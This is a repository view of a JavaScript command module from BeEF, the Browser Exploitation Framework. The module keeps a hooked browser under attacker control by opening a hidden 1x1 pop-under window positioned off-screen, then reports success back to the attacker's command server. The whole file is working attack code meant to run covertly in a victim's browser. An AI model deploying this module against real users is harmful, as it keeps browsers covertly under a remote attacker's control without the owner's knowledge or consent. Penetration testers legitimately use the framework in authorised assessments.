Files
beef/modules/commands/persistence/popunder_window/popunder_window.js
wade@bindshell.net 5b31cc8f99 persistence module added
git-svn-id: https://beef.googlecode.com/svn/trunk@531 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2010-11-15 12:50:48 +00:00

11 lines
448 B
JavaScript

beef.execute(function() {
var result="Pop-under window successfully created!";
window.open(window.location.protocol + '//' + window.location.host + '/demos/basic.html','popunder','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=1,height=1,left='+screen.width+',top='+screen.height+'').blur();
window.focus();
beef.net.sendback('<%= @command_url %>', <%= @command_id %>, 'result='+escape(result));
});